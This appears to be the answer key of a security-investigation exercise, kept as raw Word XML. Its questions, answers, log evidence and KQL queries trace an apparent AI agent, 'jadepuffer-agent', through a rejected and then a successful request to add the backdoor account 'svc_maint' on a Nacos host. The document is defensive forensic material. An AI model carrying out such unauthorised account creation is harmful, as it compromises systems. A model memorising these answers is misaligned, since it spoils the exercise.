                                <a:ext cx="5943600" cy="6724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8.00pt;height:52.95pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId21" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q5</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It asked for one thing and got another, then adjusted. What did it get, and what did it do next?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">XML, adjusted parser to get xml instead of json</w:t>
      </w:r>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLMAgentLogs_CL, 19:30:35, same record as Q4.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="50689651">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="30157AF2">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where actor == "jadepuffer-agent"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2A550494">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where model_response has "XML" and model_response has "JSON"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, model_response, tool_name, tool_args, tool_result</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4FCAD57B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="615587"/>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414" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId22"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="6155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8.00pt;height:48.47pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId22" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="707"/>
        <w:pBdr/>
        <w:spacing w:after="100" w:before="240"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section 5: Privilege Escalation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Give the time of the rejected request and the reason the server gave.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">19:34:36, blank password hash rejected</w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Syslog on ff-nacos-01: POST /nacos/v1/auth/users HTTP/1.1 403, detail="blank password hash rejected".</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="62E30476">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="1E57A674">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-nacos-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0BAAAFEE">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated between (datetime(2026-07-30T19:33:00Z) .. datetime(2026-07-30T19:36:00Z))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="5F63F795">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, ProcessName, SyslogMessage</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="709E615D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="2099835"/>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23270" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId23"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="20998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8.00pt;height:165.34pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId23" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The public report states the gap between the two attempts. Prove the successful one from the telemetry instead.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">19:35:07 UTC, pid=8801, uid=997</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LinuxAudit_CL, type ADD_USER: pid=8801 ppid=1 uid=997 comm="nacos" exe="/opt/nacos/bin/nacos" res=success msg='op=adduser id=svc_maint'. Independent local proof, not just the HTTP-level Syslog record.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="34546B6B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxAudit_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2B4F85A2">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-nacos-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="7D30F8C4">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated between (datetime(2026-07-30T19:34:30Z) .. datetime(2026-07-30T19:35:30Z))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0E6F55B0">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, AuditType, EventOriginalMessage</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3ABCC740">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="527418"/>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73571" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId24"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="5274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68.00pt;height:41.53pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId24" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q3</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">What did it leave behind on that host?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_maint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Same ADD_USER record as Q2.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2FDF18B3">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxAudit_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="33887ADD">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-nacos-01" and AuditType == "ADD_USER"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="120DBC1C">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, AuditType, EventOriginalMessage</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
